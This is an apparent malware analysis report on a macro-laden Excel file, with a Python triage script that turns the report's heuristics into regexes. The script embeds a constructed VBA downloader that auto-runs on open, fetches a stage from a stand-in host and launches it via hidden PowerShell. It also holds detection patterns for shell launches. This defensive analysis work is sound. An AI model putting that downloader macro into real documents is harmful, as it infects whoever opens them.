Malicious Office (OLE) / .XLS — malware analysis report

Static analysis result for SHA-256 a4b2c08ccb475bdd…

MALICIOUS

Office (OLE) / .XLS

Size: 57.5 KB    Created: 2021-03-31 12:20:41
MD5:     e259dfe9d4e77c25be763f9db1653e15
SHA-1:   61aa55f50938b2fe100ec9b65160c8a90f1789e2
SHA-256: a4b2c08ccb475bdd4767c584f58ca515b8991e7c9313fe2cc3c7329b47dc40c1
Risk Score: 160

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059.001 Command and Scripting Interpreter: PowerShell
  • T1105 Ingress Tool Transfer

The file contains both Excel 4.0 (XLM) macros and VBA macros. The VBA code declares and calls the urlmon URLDownloadToFileA API, which is used to fetch a second-stage payload from a remote location (T1105); the tagged T1059.001 indicates the downloaded stage is then handed to PowerShell for execution. Carrying an XLM macro sheet alongside VBA points to a multi-stage approach and is itself a strong indicator, since modern legitimate workbooks rarely contain XLM. The document body is heavily obfuscated and offers no clear user-facing lure.

Heuristics (4)

  • SC_STR_URLDOWNLOAD (critical): Reference to URLDownloadToFile API
    The URLDownloadToFile API name appears in the file's strings.
  • OLE_VBA_DOWNLOAD (critical): URLDownloadToFile in VBA
    The decoded VBA source declares or calls URLDownloadToFile.
  • OLE_XLM_AUTOOPEN (medium): Excel 4.0 (XLM) macro sheet present
    The workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • OLE_VBA_MACROS (medium): VBA macros detected
    The document contains VBA macro code.
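The heuristics above are simple pattern checks over the carved macro text, so they are easy to reproduce for triage of other samples. The script below is an added example, not the analysis platform's code and not the sample's macros: it applies the four listed rules to the decoded VBA source and XLM listing that oletools' olevba produces (the two artifact kinds carved from this sample), lists the auto-executing entry points, and aggregates a verdict. The VBA and XLM inputs are constructed stand-ins for macros.bas and xlm_macros.txt, the VBA_SHELL_EXEC rule is a hypothetical addition that covers the execution half of the download-and-execute pattern, and the severity weights are an assumption; the platform's own risk score of 160 is not reproduced.

```python
"""Triage decoded Office macro text against the report's heuristics.

Added example; not the analysis platform's code and not this sample's macros.
Inputs are the text files olevba emits (decoded VBA source, XLM listing).
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    rule_id: str
    severity: str
    title: str
    source: str          # "vba" or "xlm": which carved artifact the rule inspects
    pattern: re.Pattern


@dataclass(frozen=True)
class Hit:
    rule_id: str
    severity: str
    title: str
    evidence: str        # the first matching line, for the analyst


# The four heuristics from the report, as line-oriented regexes, plus one
# hypothetical rule (VBA_SHELL_EXEC, not in the report) for the launcher side.
RULES = [
    Rule("SC_STR_URLDOWNLOAD", "critical", "Reference to URLDownloadToFile API", "vba",
         re.compile(r"URLDownloadToFile", re.I)),
    Rule("OLE_VBA_DOWNLOAD", "critical", "URLDownloadToFile in VBA", "vba",
         re.compile(r"^\s*(?:Private\s+|Public\s+)?Declare\b.*\bURLDownloadToFile", re.I | re.M)),
    Rule("OLE_XLM_AUTOOPEN", "medium", "Excel 4.0 (XLM) macro sheet present", "xlm",
         re.compile(r"Excel 4\.0 macro sheet|\bAuto_Open\b", re.I)),
    Rule("OLE_VBA_MACROS", "medium", "VBA macros detected", "vba",
         re.compile(r"^\s*(?:Private\s+|Public\s+)?(?:Sub|Function)\b", re.I | re.M)),
    Rule("VBA_SHELL_EXEC", "high", "Shell/PowerShell launch from VBA", "vba",
         re.compile(r"\bShell\b|WScript\.Shell|\bpowershell\b", re.I)),
]

# Assumed weights for an illustrative score (the platform's scoring is unknown).
WEIGHTS = {"critical": 50, "high": 30, "medium": 20, "low": 5}

# Procedure names Office runs automatically on open/close.
AUTO_EXEC = re.compile(
    r"\b(Auto_?Open|Workbook_Open|Document_Open|Auto_?Close|Workbook_Activate)\b", re.I)

# Constructed stand-in for macros.bas: a minimal downloader, not the sample's code.
SAMPLE_VBA = r'''
Attribute VB_Name = "ThisWorkbook"
Private Declare PtrSafe Function URLDownloadToFileA Lib "urlmon" Alias "URLDownloadToFileA" _
    (ByVal pCaller As LongPtr, ByVal szURL As String, ByVal szFileName As String, _
     ByVal dwReserved As Long, ByVal lpfnCB As LongPtr) As Long

Private Sub Workbook_Open()
    Dim p As String
    p = Environ("TEMP") & "\upd.exe"
    URLDownloadToFileA 0, "http://example.invalid/stage2.bin", p, 0, 0
    Shell "powershell -w hidden -c Start-Process '" & p & "'", vbHide
End Sub
'''

# Constructed stand-in for xlm_macros.txt in the style olevba prints it.
SAMPLE_XLM = '''
' Sheet1: Macro1 (Excel 4.0 macro sheet)
CELL:A1, Auto_Open, =HALT()
'''


def _line_of(text: str, m: re.Match) -> str:
    start = text.rfind("\n", 0, m.start()) + 1
    end = text.find("\n", m.end())
    return text[start:len(text) if end == -1 else end].strip()


def triage(vba_src: str, xlm_listing: str) -> list:
    """Run every rule against the artifact it targets; one Hit per firing rule."""
    hits = []
    for r in RULES:
        text = vba_src if r.source == "vba" else xlm_listing
        m = r.pattern.search(text)
        if m:
            hits.append(Hit(r.rule_id, r.severity, r.title, _line_of(text, m)))
    return hits


def entry_points(vba_src: str) -> list:
    """Auto-executing procedure names found in the VBA, de-duplicated in order."""
    found = []
    for m in AUTO_EXEC.finditer(vba_src):
        if m.group(1) not in found:
            found.append(m.group(1))
    return found


def score(hits) -> int:
    return sum(WEIGHTS[h.severity] for h in hits)


def verdict(hits) -> str:
    sev = {h.severity for h in hits}
    if "critical" in sev:
        return "MALICIOUS"
    return "SUSPICIOUS" if sev else "CLEAN"


if __name__ == "__main__":
    hits = triage(SAMPLE_VBA, SAMPLE_XLM)
    for h in hits:
        print(f"{h.rule_id:<20} {h.severity:<9} {h.title}\n    {h.evidence}")
    print("entry points:", entry_points(SAMPLE_VBA))
    print("score:", score(hits), "verdict:", verdict(hits))
```

On real input, feed the script the files olevba writes (or `olevba --decode` output) rather than the constructed strings; the OLE_XLM_AUTOOPEN rule fires on the XLM listing alone, so a workbook whose only payload is an Excel 4.0 sheet is still flagged even when the VBA project is empty.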

Extracted artifacts (2)

Files carved from inside the sample during analysis.

xlm_macros.txt
  SHA-256: ae758ec551bf718a0c766cd5f899bcd2c35d4584ecca609454b4e93b017a6412
  Kind:    xlm-macro
  Source:  oletools.olevba.extract_all_macros (XLM macro listing)
  Size:    675 bytes

macros.bas
  SHA-256: ab6e1002e0bf816ed39394e653bbdeaea610547c9ac92d50c859b9fde925072b
  Kind:    vba-macro
  Source:  oletools.olevba.extract_macros (decoded VBA source)
  Size:    2869 bytes